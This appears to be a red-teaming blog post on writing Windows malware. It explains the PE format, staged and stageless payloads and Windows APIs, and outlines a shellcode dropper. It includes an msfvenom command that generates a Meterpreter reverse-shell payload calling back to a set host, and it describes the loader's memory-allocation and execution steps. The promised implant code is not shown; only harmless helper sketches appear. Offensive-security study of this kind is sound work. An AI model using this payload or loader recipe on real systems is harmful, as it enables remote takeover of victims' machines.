- Welcome to another red teaming blog post, where we dive into malware development and how we can write malware using C/C++.
- We will go over some fundamentals, such as the PE file structure and Windows APIs, and then see how we can put together a dropper that executes shellcode for us on a target system.
- Windows 10 box
- Any IDE
- Basic programming knowledge
- In my red teaming journey, writing custom tooling has always played a big role in understanding the current threat landscape and emulating what adversaries are doing, and I guess… it’s just fun!
The PE file structure #
The portable executable (PE) format, also called the Windows executable file format, is a data structure in Windows that holds the information necessary to execute files.
It is used to organize executable files, object files, DLLs, and FON font files in 32-bit and 64-bit versions of Windows operating systems.
Understanding how file components are organized in a PE is very important when it comes to the design and analysis of malware.
In both the analysis and the development of malware, familiarity with the PE file structure helps you understand how malware works at a basic level and what it does from a behavioral analysis point of view: how it interacts with the operating system and with any antivirus or EDR in place, how it communicates externally, and so on.
In its simplest form, the PE file format is organized as follows:
- The DOS header takes up the first 64 bytes of the file and holds various metadata about the executable.
- The header components include:

| Component | Description |
| --- | --- |
| DOS Header | Identifies an MS-DOS compatible file type using the “MZ” initials. |
| DOS Stub | Prints “This program cannot be run in DOS mode” when the file is executed in DOS. |
| PE File Header | Contains the signature that identifies the executable as a PE. |
| Image Optional Header | Holds optional information about a PE, such as the base address of the image in memory, the sizes of the code/data sections, the entry point relative virtual address, etc. |
| Section Table | Describes each section in the PE: its name, size, virtual address, and attributes (readable, writable, executable). |
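From an analysis point of view, the header layout above can be checked in a few lines. The following is a minimal sketch, assuming the file has already been read into a byte buffer. The helper names (`looks_like_pe`, `make_synthetic_header`) are hypothetical and written for this illustration. The only format details relied on are the “MZ” magic at offset 0, the `e_lfanew` field at offset 0x3C of the DOS header, and the `PE\0\0` signature it points to.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper names; the offsets follow the documented PE layout.
constexpr std::size_t kDosHeaderSize = 64;   // size of the DOS header in bytes
constexpr std::size_t kLfanewOffset = 0x3C;  // e_lfanew: file offset of the PE signature

// Read a little-endian 32-bit value from the buffer (caller checks bounds).
static std::uint32_t read_u32_le(const std::vector<std::uint8_t>& buf, std::size_t off) {
    return static_cast<std::uint32_t>(buf[off]) |
           (static_cast<std::uint32_t>(buf[off + 1]) << 8) |
           (static_cast<std::uint32_t>(buf[off + 2]) << 16) |
           (static_cast<std::uint32_t>(buf[off + 3]) << 24);
}

// Returns true when the buffer starts with "MZ" and e_lfanew points at "PE\0\0".
bool looks_like_pe(const std::vector<std::uint8_t>& buf) {
    if (buf.size() < kDosHeaderSize) return false;
    if (buf[0] != 'M' || buf[1] != 'Z') return false;
    const std::uint32_t pe_off = read_u32_le(buf, kLfanewOffset);
    if (pe_off > buf.size() || buf.size() - pe_off < 4) return false;
    static const std::uint8_t sig[4] = {'P', 'E', 0, 0};
    return std::memcmp(buf.data() + pe_off, sig, 4) == 0;
}

// Builds a tiny synthetic buffer for experimenting. It is NOT a loadable
// executable: only the magic, e_lfanew, and the PE signature are filled in.
std::vector<std::uint8_t> make_synthetic_header(std::uint32_t pe_off) {
    if (pe_off < kDosHeaderSize) pe_off = kDosHeaderSize;  // keep the signature past the DOS header
    std::vector<std::uint8_t> buf(pe_off + 4, 0);
    buf[0] = 'M';
    buf[1] = 'Z';
    for (int i = 0; i < 4; ++i) {
        buf[kLfanewOffset + i] = static_cast<std::uint8_t>(pe_off >> (8 * i));
    }
    buf[pe_off] = 'P';
    buf[pe_off + 1] = 'E';
    return buf;
}
```

Calling `looks_like_pe(make_synthetic_header(0x80))` exercises the happy path. A real parser would go on to read the file header and optional header that follow the signature, which this sketch deliberately leaves out.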
- These are the components that make up the PE sections:

| Section | Description |
| --- | --- |
| .text | Contains executable code. |
| .data | Holds initialized data. |
| .bss | Stores uninitialized data. |
| .rsrc | Stores non-executable resources. |
| .idata | Lists imported functions and libraries. |
| .edata | Lists exported functions and symbols. |
| .pdata | Contains exception handling information. |
| .debug | Holds debugging-related data. |
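The readable/writable/executable attributes of a section are stored as bits in its `Characteristics` field. As a rough sketch, the helper below (`describe_section_perms`, a hypothetical name) decodes those three bits into an `rwx`-style string. The constants mirror the documented `IMAGE_SCN_MEM_*` values, and the sample inputs in the usage note are values commonly seen for `.text` and `.data`, not values taken from any particular file.

```cpp
#include <cstdint>
#include <string>

// Documented section-characteristics bits from the PE format.
constexpr std::uint32_t kScnMemExecute = 0x20000000;  // IMAGE_SCN_MEM_EXECUTE
constexpr std::uint32_t kScnMemRead = 0x40000000;     // IMAGE_SCN_MEM_READ
constexpr std::uint32_t kScnMemWrite = 0x80000000;    // IMAGE_SCN_MEM_WRITE

// Hypothetical helper: render the memory-permission bits as an "rwx"-style string.
std::string describe_section_perms(std::uint32_t characteristics) {
    std::string out;
    out += (characteristics & kScnMemRead) ? 'r' : '-';
    out += (characteristics & kScnMemWrite) ? 'w' : '-';
    out += (characteristics & kScnMemExecute) ? 'x' : '-';
    return out;
}
```

For example, `describe_section_perms(0x60000020)` yields `r-x` (a typical code section) and `describe_section_perms(0xC0000040)` yields `rw-` (a typical initialized-data section). Sections that are both writable and executable tend to stand out during analysis.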
Staged vs Stageless #
- These are two different approaches to delivering malware.
Stageless malware is standalone, self-contained malware that does not rely on external resources to complete execution.
Staged malware follows a different approach. It runs in multiple phases, usually two or more, where the first, commonly referred to as the stager, is a small piece of code responsible for establishing a C2 connection with the infrastructure. Its main job is to load the subsequent stage of the malware.
- A common example is the Metasploit framework, where stageless payloads use the notation meterpreter_:
- Staged payloads use the notation meterpreter/:
- Both have their pros and cons. Staged payloads tend to be more evasive and better at bypassing AVs because the malware executes in separate stages. Stageless payloads keep things simple but can be bulky to deliver. We will look into both ways of developing this malware.
Processes, Threads, Handles #
- A process is a program in execution. It can be made up of multiple threads executing instructions at the same time.
- A thread is the smallest unit of execution within a process. Processes can have multiple threads that share the process’s resources.
- A handle is an identifier used to access a resource (files, threads, memory). When a process needs to access resources, the OS will provide a handle that the process will use to access said resources.
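To make the process/thread relationship concrete, here is a small portable sketch using the C++ standard library rather than the Windows API. The function name `count_with_threads` is hypothetical. Each `std::thread` object plays a role loosely similar to a handle, in that the program uses it to refer to and wait on the underlying OS thread, though that analogy is an illustration and not a statement about how Windows handles are implemented.

```cpp
#include <atomic>
#include <thread>
#include <vector>

// Hypothetical helper: starts `workers` threads inside the current process.
// Every thread increments the same counter, which shows that threads share
// the memory of the process they belong to.
int count_with_threads(int workers, int per_thread) {
    std::atomic<int> counter{0};
    std::vector<std::thread> pool;
    for (int i = 0; i < workers; ++i) {
        pool.emplace_back([&counter, per_thread] {
            for (int j = 0; j < per_thread; ++j) {
                counter.fetch_add(1);
            }
        });
    }
    // Wait for every thread to finish before reading the result.
    for (auto& t : pool) {
        t.join();
    }
    return counter.load();
}
```

With four workers adding 1000 each, the function returns 4000. The counter is atomic because the threads genuinely run concurrently and write to the same memory.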
- Shellcode is a set of instructions that is meant to be executed directly by a target system. Once executed, it could provide a callback connection to the attacker or execute arbitrary commands on the target.
- It is typically written in assembly and designed to be very efficient, leveraging various system calls or APIs to achieve the intended goal.
- We can quickly generate shellcode using msfvenom:
➜ ~ msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.100.72 LPORT=443 EXITFUNC=thread -f C
Windows APIs #
- Windows APIs play a key role in malware development, as they provide a standardized interface for the malware to interact with the operating system.
- The Windows API is a collection of functions, data structures, and constants provided by the Windows OS.
- It allows developers to create applications that can interact with the underlying resources.
- The APIs are well documented, and we will use that documentation as a reference.
MessageBox API #
We will write our first program that uses a Windows API (MessageBox) to display some text. The API and its parameters are well documented.
In your IDE, import the relevant libraries and call the API as described in the docs.
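A minimal sketch of such a program might look like the following. It assumes the ANSI variant `MessageBoxA` from `windows.h`. The wrapper name `show_message` and the non-Windows fallback that prints to the console are additions for illustration, so the snippet also compiles on other platforms.

```cpp
#include <cstdio>
#ifdef _WIN32
#include <windows.h>
#endif

// Hypothetical wrapper: shows a dialog on Windows and prints to the console
// elsewhere. Returns the button identifier (IDOK is 1 on Windows).
int show_message(const char* text, const char* caption) {
#ifdef _WIN32
    // Parameters: owner window (none), message text, caption, style flags.
    return MessageBoxA(nullptr, text, caption, MB_OK | MB_ICONINFORMATION);
#else
    std::printf("[%s] %s\n", caption, text);
    return 1;  // mirror IDOK so callers behave the same way
#endif
}
```

Calling `show_message("Hello from the Windows API", "Demo")` from `main` displays the dialog on Windows. When building from the command line rather than an IDE project, the program may need to be linked against `user32.lib`.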
High-level Overview #
- At a high level, the dropper’s implementation to execute shellcode is as follows:
- Embed the shellcode in the dropper as a byte array of the shellcode’s raw hex.
- Allocate memory in the process for the shellcode to be copied into
- Copy the shellcode into the allocated memory
- Execute the shellcode
- Let’s move on to the APIs necessary to implement for our dropper.
- VirtualAlloc reserves or commits regions of memory within the virtual address space of a process.
- We will use this to allocate the necessary space for storing the shellcode.
- This memory manipulation function is used to copy a block of memory from one location to another.
- We will use this to copy the shellcode into the memory allocated by VirtualAlloc
- The VirtualProtect function changes the protection settings of a region of virtual memory. We will use it to modify the permissions of the memory block we copied our shellcode to; in this case, we add execute and read permissions so that the shellcode can run.
- We use this to create a thread that is executed within the address space of another process. This is what runs our shellcode.
- It is used to wait until the specified object is in a certain state or until a timeout interval elapses. We use this to keep our shellcode running indefinitely until a failure is encountered.
The Stageless implant #
- Putting together the above APIs, we have the following C++ stageless implant that executes shellcode for us.
- You can build upon the above code by making it staged, such that it pulls shellcode from a remote source, loads it into a byte array then proceeds with the execution routine.